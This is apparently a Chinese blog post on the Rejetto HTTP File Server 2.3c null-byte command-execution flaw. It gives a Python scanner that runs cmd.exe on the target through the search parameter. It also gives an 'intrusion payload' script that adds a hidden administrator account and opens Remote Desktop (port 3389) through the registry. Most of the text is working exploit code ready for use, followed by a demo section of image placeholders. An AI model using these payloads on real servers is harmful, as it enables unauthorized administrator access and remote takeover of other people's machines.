1、漏洞说明
HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
2、扫描器
#-*- coding:utf-8 -*-
"""
这个脚本是检测是否有HFS漏洞的
当HFS版本处于2.3c机器之前的HFS2.3x版本均可以
当HFS以管理员身份运行时候可以get-shell
原理是创建一个新用户,设置密码和权限,然后你就可以RDP了
"""
#引入依赖的包、库文件
import time
import uuid
import requests
from optparse import OptionParser
#定义扫描类
class HFSScanner:
"""
HFS扫描类,原理是:
(1)生成随机字符串,利用命令执行写入远端服务器的HFS.exe目录下的一个文件。
(2)然后再次利用这里漏洞将文件内容读取出来放在响应报文的头部字段set-cookie中。
(3)通过判断响应报文该字段是否包含随机字符串来确定是否存在漏洞
"""
def __init__(self,target,port):
"""创建扫描类实例对象"""
self.__randomflag = uuid.uuid1() #攻击验证随机标志字符串
self.__attack_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+r"{.exec|cmd.exe /c del result}"+r"{"+".exec|cmd.exe /c echo>result "+str(self.__randomflag)+"."+"}"
self.__verify_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+"{.cookie|out|value={.load|result.}.}"
33 def __attack(self):
34 """发送攻击报文,响应200后反回True"""
35 try:
36 response = requests.get(self.__attack_url,timeout=120)
37 except Exception,reason:
38 return False
39 if response.status_code != 200:
40 return False
41 return True
42
43 def __verify(self):
44 """发送验证报文,判断set-cookie字段是否为随机标志字符串"""
45 try:
46 response = requests.get(self.__verify_url,timeout=120)
47 except Exception,reason:
48 return False
49 if response.headers.get("set-cookie").find(str(self.__randomflag)) >= 0:
50 return True
51 else:
52 return False
53
54 def scan(self):
55 """扫描函数"""
56 print "[+] 开始测试..."
57 if self.__attack():
58 time.sleep(5)
59 if self.__verify():
60 return True
61 return False
62
63 if __name__ == "__main__":
64 parser = OptionParser("")
65 parser.add_option("-t", dest="target",help="target to scan")
66 parser.add_option("-p", dest="port",help="port to scan")
67 (options, args) = parser.parse_args()
68 if options.target in ["",None]:
69 print "[-] 请输入正确的参数!"
70 print """
71 正确的使用方法:
72 #python hfs_vuln_scan.py -t 127.0.0.1 [-p 8080]
73 """
74 exit(0)
75 if options.port in ["",None] or int(options.port) <= 0 and int(options.port) > 65535:
76 options.port = "80"
77 scanner = HFSScanner(options.target,options.port)
78 if scanner.scan():
79 print "[*] 目标主机存在漏洞"
80 else:
81 print "[+] 目标主机不存在漏洞"
3、入侵payload
python 编写入侵payload
"""
1.接受输入的漏洞地址
2.组合漏洞地址并请求
3.判断漏洞是否利用成功
4.将利用成功的进行输出
"""
import requests
url = "http://192.168.1.1" # 这里换成自己hfs服务器的地址
add_user ="/?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20Adminzhuai%20adminzhuai%20/add%20%26%20net%20localgroup%20administrators%20Adminzhuai%20/add.%7D"
# 创建用户Adminzhuai adminzhuai 并添加到管理员
open3389 ="/?search==%00%7B.exec%7Ccmd.exe%20/c%20REG%20ADD%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%22%20%22Server%20/v%20fDenyTSCconneections%20/t%20REG_DWORD%20/d%2000000000%20/f.%7D"
# 开启3389端口
url_adduser = url + add_user
url_open3389 = url + open3389
def adduser():
code = requests.get(url_adduser).status_code
if code == 200:
print("添加用户成功")
else:
print("添加用户失败")
def open3389():
code2 = requests.get(url_open3389).status_code
if code2 ==200:
print("开启3389成功")
else:
print("开启3389失败")
adduser()
open3389()
4、攻击工具演示
靶机用户及3389情况
image.png
image.png
扫描工具发现开启HFS服务
image.png
攻击工具进行攻击
